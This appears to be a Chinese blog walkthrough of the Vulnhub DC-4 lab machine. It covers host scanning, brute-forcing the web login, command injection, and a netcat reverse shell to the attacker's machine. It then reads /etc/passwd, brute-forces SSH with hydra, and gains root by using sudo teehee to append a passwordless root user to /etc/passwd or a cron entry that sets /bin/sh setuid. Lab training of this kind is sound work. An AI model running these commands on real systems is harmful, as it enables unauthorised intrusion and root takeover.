Vulnhub靶机DC系列-DC4

Delina · 发表于 2021-10-21 15:23:38

原文链接：Vulnhub靶机DC系列-DC4

0x10 准备工作

DC-系列靶机下载地址：https://www.five86.com/

1、下载DC-4 https://www.five86.com/downloads/DC-4.zip

2、安装DC-4到虚拟机，并把DC-4的⽹络设置net模式，⽅便寻找存活主机

kali：192.168.44.128

DC-4：192.168.44.136

????看样子已经安装好了呢，让我们开始吧！

???? HACKING！！！

┌──(root????r00t)-[/home/r00t]

└─# arp-scan -l

Interface: eth0, type: EN10MB, MAC: 00:0c:29:f2:d7:dd, IPv4: 192.168.44.128

Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)

192.168.44.1 00:50:56:c0:00:08 VMware, Inc.

192.168.44.2 00:50:56:f8:c2:19 VMware, Inc.

192.168.44.136 00:0c:29:49:88:5a VMware, Inc.

192.168.44.254 00:50:56:fb:dc:24 VMware, Inc.

????现在进行主机信息的详细扫描

┌──(root????r00t)-[/home/r00t]

└─# nmap -T4 -A -p- 192.168.44.136

Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-18 16:11 CST

Nmap scan report for 192.168.44.136

Host is up (0.0013s latency).

Not shown: 65533 closed ports

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)

| ssh-hostkey:

| 2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)

| 256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)

|_ 256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)

80/tcp open http nginx 1.15.10

|_http-server-header: nginx/1.15.10

|_http-title: System Tools

MAC Address: 00:0C:29:49:88:5A (VMware)

Device type: general purpose

Running: Linux 3.X|4.X

OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4

OS details: Linux 3.2 - 4.9

Network Distance: 1 hop

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE

HOP RTT ADDRESS

1 1.26 ms 192.168.44.136

????访问看看

????惊喜越来越少，就只开放了80、22端口只有登录页面，用BurpSuite抓包一波

????熟悉的感觉，扔到Intuder，集束炸弹爆破走起

????这里payload set 1为用户名选用kali自带的字典就可以跑，payload set 2为密码用相同的字典也可以，靶场情况往往百分百，其他情况要视情况来选择字典，因为跑得时间比较久，burpsuite社区版只能一组一组非常慢。

????‍♂️看到这个返回长度不一样那就是有结果，可以进去看看

✅登录成功了

????????进一步发现这个页面主要是测试运行系统命令功能，再抓包一下看看途中它到底干了啥

????radio=<命令>，有了参数扔到Repeater重放，改一下看一下自己的权限

????写一个反弹shell到我的终端，先监听后放包
nc -e /bin/sh 192.168.44.128 666

┌──(root????r00t)-[/home/r00t]

└─# nc -lvp 666

listening on [any] 666 ...

192.168.44.136: inverse host lookup failed: Unknown host

connect to [192.168.44.128] from (UNKNOWN) [192.168.44.136] 34554

ls

command.php

css

images

index.php

login.php

logout.php

cat /etc/passwd

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

-----****省略****-----

nginx:x:107:111:nginx user,,,:/nonexistent:/bin/false

charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash

jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash

sam:x:1003:1003:Sam,,,:/home/sam:/bin/bash

Debian-exim:x:108:112::/var/spool/exim4:/bin/false

????下一步就可以看系统文件/etc/passwd，发现有两个用户jim、sam；先进jim的目录下有没有发现什么

cd /home

pwd

/home

ls

charles

jim

sam

cd jim

ls

backups

mbox

test.sh

cd backups

ls

old-passwords.bak

cat old-passwords.bak

000000

12345

iloveyou

-----***省略****-----

123456k

icecream

popcorn1

????发现old-password.bak，里面就存放着备份密码，然后把里面的信息拿出来保存到本地目录并用hydra爆破ssh登录

┌──(root????r00t)-[/home/r00t]

└─# hydra -l jim -P jim_passwd.txt ssh://192.168.44.136

┌──(root????r00t)-[/home/r00t]

└─# ssh jim@192.168.44.136

The authenticity of host '192.168.44.136 (192.168.44.136)' can't be established.

ECDSA key fingerprint is SHA256:vtcgdCXO4d3KmnjiIIkH1Een5F1AiSx3qp0ABgwdvww.

Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

Warning: Permanently added '192.168.44.136' (ECDSA) to the list of known hosts.

jim@192.168.44.136's password:

Linux dc-4 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) i686

The programs included with the Debian GNU/Linux system are free software;

the exact distribution terms for each program are described in the

individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent

permitted by applicable law.

You have mail.

Last login: Sun Apr 7 02:23:55 2019 from 192.168.0.100

jim@dc-4:~$

????提示有封邮件，那就进入mail的目录看看

jim@dc-4:/$ ls

bin home lost+found proc srv var

boot initrd.img media root sys vmlinuz

dev initrd.img.old mnt run tmp vmlinuz.old

etc lib opt sbin usr

jim@dc-4:/$ cd var/

jim@dc-4:/var$ ls

backups lib lock mail run tmp

cache local log opt spool www

jim@dc-4:/var$ cd mail

jim@dc-4:/var/mail$ ls

jim

jim@dc-4:/var/mail$ cat jim

From charles@dc-4 Sat Apr 06 21:15:46 2019

Return-path:

Envelope-to: jim@dc-4

Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000

Received: from charles by dc-4 with local (Exim 4.89)

(envelope-from )

id 1hCjIX-0000kO-Qt

for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000

To: jim@dc-4

Subject: Holidays

MIME-Version: 1.0

Content-Type: text/plain; charset="UTF-8"

Content-Transfer-Encoding: 8bit

Message-Id:

From: Charles

Date: Sat, 06 Apr 2019 21:15:45 +1000

Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is: ^xHhA&hvim0y

See ya,

Charles

jim@dc-4:/var/mail$

????翻译过来

嗨,吉姆,

我今天下班要去度假，所以老板让我把密码给你，以防出错。

密码是:^xHhA&hvim0y

再见,

查尔斯

????噢~真是倒霉的查尔斯，现在我们su进charles用户，再查看一下权限

charles@dc-4:~$ sudo -l

Matching Defaults entries for charles on dc-4:

env_reset, mail_badpass,

secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:

(root) NOPASSWD: /usr/bin/teehee

charles@dc-4:~$

????可以发现teehee是可以以root权限免密run，这里要提一下teehee：通过root免密执行teehee输入，以root权限写入crontab计划任务提权

先执行后追加

sudo teehee /etc/crontab

echo "* * * * * root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab

或者

echo "r00t-cool::0:0:::/bin/sh" | sudo teehee -a /etc/passwd

charles@dc-4:~$ echo "r00t-cool::0:0:::/bin/sh" | sudo teehee -a /etc/passwd

r00t-cool::0:0:::/bin/sh

charles@dc-4:~$ su r00t-cool

# whoami

root

# pwd

/home/charles

#

????到root根目录下查看flag.txt，大功告成！

????‍♂️溜了溜了

三、总结

搜集信息、拦截重放、提权

附参考链接：

Burpsuite文档：https://yw9381.gitbooks.io/burp_ ... ntent/contents.html

hydra 指导手册：https://zhuanlan.zhihu.com/p/145475243

Crontab：Linux定时任务Crontab命令详解 - 再见理想 - 博客园

		自动登录	找回密码
密码			立即注册